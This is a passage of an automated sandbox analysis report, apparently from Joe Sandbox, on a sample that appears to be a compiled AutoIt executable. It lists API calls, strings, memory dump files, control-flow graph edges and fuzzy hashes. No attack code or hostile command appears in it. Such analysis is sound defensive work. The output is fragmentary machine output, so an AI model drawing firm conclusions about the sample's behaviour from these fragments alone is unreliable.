                                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                  • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                  • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                    • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                    • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                    • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                  Strings
                                                                                  • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                  • String ID: NULL Pointer assignment
                                                                                  • API String ID: 440038798-2785691316
                                                                                  • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                  • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                  • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                  • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1986 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1995 40e582-40e583 1986->1995 1996 427674-427679 1986->1996 1999 40e585-40e596 1995->1999 2000 40e5ba-40e5cb call 40ef60 1995->2000 1997 427683-427686 1996->1997 1998 42767b-427681 1996->1998 2003 427693-427696 1997->2003 2004 427688-427691 1997->2004 2002 4276b4-4276be 1998->2002 2005 427625-427629 1999->2005 2006 40e59c-40e59f 1999->2006 2017 40e5ec-40e60c 2000->2017 2018 40e5cd-40e5e6 GetCurrentProcess call 40ef20 2000->2018 2019 4276c6-4276ca GetSystemInfo 2002->2019 2003->2002 2009 427698-4276a8 2003->2009 2004->2002 2011 427636-427640 2005->2011 2012 42762b-427631 2005->2012 2007 40e5a5-40e5ae 2006->2007 2008 427654-427657 2006->2008 2013 40e5b4 2007->2013 2014 427645-42764f 2007->2014 2008->2000 2020 42765d-42766f 2008->2020 2015 4276b0 2009->2015 2016 4276aa-4276ae 2009->2016 2011->2000 2012->2000 2013->2000 2014->2000 2015->2002 2016->2002 2022 40e612-40e623 call 40efd0 2017->2022 2023 4276d5-4276df GetSystemInfo 2017->2023 2018->2017 2030 40e5e8 2018->2030 2019->2023 2020->2000 2022->2019 2028 40e629-40e63f call 40ef90 GetNativeSystemInfo 2022->2028 2032 40e641-40e642 FreeLibrary 2028->2032 2033 40e644-40e651 2028->2033 2030->2017 2032->2033 2034 40e653-40e654 FreeLibrary 2033->2034 2035 40e656-40e65d 2033->2035 2034->2035
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                    • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                    • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                  • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                  • String ID: 0SH
                                                                                  • API String ID: 3363477735-851180471
                                                                                  • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                  • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                  • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                  • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: IsThemeActive$uxtheme.dll
                                                                                  • API String ID: 2574300362-3542929980
                                                                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                  APIs
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                  • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                  • TranslateMessage.USER32(?), ref: 00409556
                                                                                  • DispatchMessageW.USER32(?), ref: 00409561
                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$Peek$DispatchSleepTranslate
                                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                  • API String ID: 1762048999-758534266
                                                                                  • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                  • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                  • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                  • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                    • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                    • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                  • __wcsicoll.LIBCMT ref: 00402007
                                                                                  • __wcsicoll.LIBCMT ref: 0040201D
                                                                                  • __wcsicoll.LIBCMT ref: 00402033
                                                                                    • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                  • __wcsicoll.LIBCMT ref: 00402049
                                                                                  • _wcscpy.LIBCMT ref: 0040207C
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                  • API String ID: 3948761352-1609664196
                                                                                  • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                  • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                  • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                  • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                  • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                    • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                  • _wcsncat.LIBCMT ref: 0040E433
                                                                                  • __wmakepath.LIBCMT ref: 0040E44F
                                                                                    • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                  • _wcscpy.LIBCMT ref: 0040E487
                                                                                    • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                  • _wcscat.LIBCMT ref: 00427541
                                                                                  • _wcslen.LIBCMT ref: 00427551
                                                                                  • _wcslen.LIBCMT ref: 00427562
                                                                                  • _wcscat.LIBCMT ref: 0042757C
                                                                                  • _wcsncpy.LIBCMT ref: 004275BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                  • String ID: Include$\
                                                                                  • API String ID: 3173733714-3429789819
                                                                                  • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                  • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                  • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                  • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • _fseek.LIBCMT ref: 0045292B
                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                    • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                    • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                  • __fread_nolock.LIBCMT ref: 00452961
                                                                                  • __fread_nolock.LIBCMT ref: 00452971
                                                                                  • __fread_nolock.LIBCMT ref: 0045298A
                                                                                  • __fread_nolock.LIBCMT ref: 004529A5
                                                                                  • _fseek.LIBCMT ref: 004529BF
                                                                                  • _malloc.LIBCMT ref: 004529CA
                                                                                  • _malloc.LIBCMT ref: 004529D6
                                                                                  • __fread_nolock.LIBCMT ref: 004529E7
                                                                                  • _free.LIBCMT ref: 00452A17
                                                                                  • _free.LIBCMT ref: 00452A20
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 1255752989-0
                                                                                  • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                  • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                  • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                  • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __fread_nolock$_fseek_wcscpy
                                                                                  • String ID: FILE
                                                                                  • API String ID: 3888824918-3121273764
                                                                                  • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                  • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                  • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                  • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                  • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                  • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                  • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                  • ImageList_ReplaceIcon.COMCTL32(0096F610,000000FF,00000000), ref: 00410552
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                  • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                  • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                  • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                  • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                  • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                  • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                  • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                  • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                    • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                    • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                    • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                    • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                    • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                    • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                    • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0096F610,000000FF,00000000), ref: 00410552
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                  • String ID: #$0$AutoIt v3
                                                                                  • API String ID: 423443420-4155596026
                                                                                  • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                  • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                  • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                  • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _malloc
                                                                                  • String ID: Default
                                                                                  • API String ID: 1579825452-753088835
                                                                                  • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                  • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                  • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                  • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
